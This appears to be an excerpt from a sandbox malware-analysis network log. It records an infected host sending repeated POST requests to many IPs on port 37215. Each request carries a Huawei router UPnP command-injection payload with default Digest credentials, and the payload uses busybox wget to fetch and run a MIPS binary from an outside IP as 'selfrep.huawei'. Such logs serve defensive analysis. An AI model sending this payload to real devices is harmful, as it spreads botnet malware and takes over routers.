                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1203192.168.2.234799448.173.203.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.324893951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1204192.168.2.2343668157.31.17.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.324904919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1205192.168.2.233534641.51.126.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.324911118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1206192.168.2.2342556134.21.51.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325267076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1207192.168.2.2360700197.153.245.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325306892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1208192.168.2.2359816157.91.34.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325335026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1209192.168.2.2349658197.73.35.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325350046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1210192.168.2.235766841.92.254.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325422049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1211192.168.2.234507441.221.54.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325428963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1212192.168.2.2352556197.239.86.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.325558901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
